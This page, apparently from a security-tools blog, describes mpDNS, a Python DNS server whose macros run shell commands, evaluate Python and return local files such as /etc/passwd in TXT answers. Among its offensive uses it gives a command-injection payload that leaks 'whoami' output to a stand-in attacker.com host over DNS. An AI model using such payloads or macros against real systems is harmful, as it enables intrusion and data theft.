mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.
{{shellexec::dig google.com +short}}
-> Execute shell command and respond with result{{eval::res = '1.1.1.%d' % random.randint(0,256)}}
-> Evaluate your python code{{file::/etc/passwd}}
-> Respond with localfile contents{{resolve}}
-> Forward DNS request to local system DNS{{resolve::example.com}}
-> Resolve example.com instead of original record{{echo}}
-> Response back with peer address{{shellexec::echo %PEER% %QUERY%}}
-> Use of variablesA
, CNAME
, TXT
names.db
records without restart/reload with ./mpdns.py -e
Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
Usage: ./mpdns.py
./mpdns.py -e
no restart requiredOffensive and Defensive purposes
/ping.php?ip=$(dig $(whoami).attacker.com)
)TXT
querygit clone https://github.com/nopernik/mpDNS
TXT
records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200bTXT
record with macro {{file:localfile.txt}}
is limited to 65200 bytes.test.*.example.com
{{resolve::example.com}}
macroTTL
always set to 0Also Read – Http Request Smuggler : Extension For Burp Suite
names.db example:
>>Empty configuration will result in empty but valid responses
>>Unicode domain names are not supported but still can be catched by the server.
>> For example мама-сервер-unicode.google.com will be catched but with SERVFAIL response
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}
Example output with names.db example:
Regular resolution from DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A
;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:
>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)
Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
Forward request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
Forward request of custom domain macro: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT “root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:……stripped”
mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> ‘root:x:0:0:root…(2808)’
Custom python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT “320”
mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> ‘320’
Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT “root”
mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> ‘root’
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
If you are working with Linux or writing bash scripts, one of the most common…
What is a bash case statement? A bash case statement is a way to control…
Why Do We Check Files in Bash? When writing a Bash script, you often work…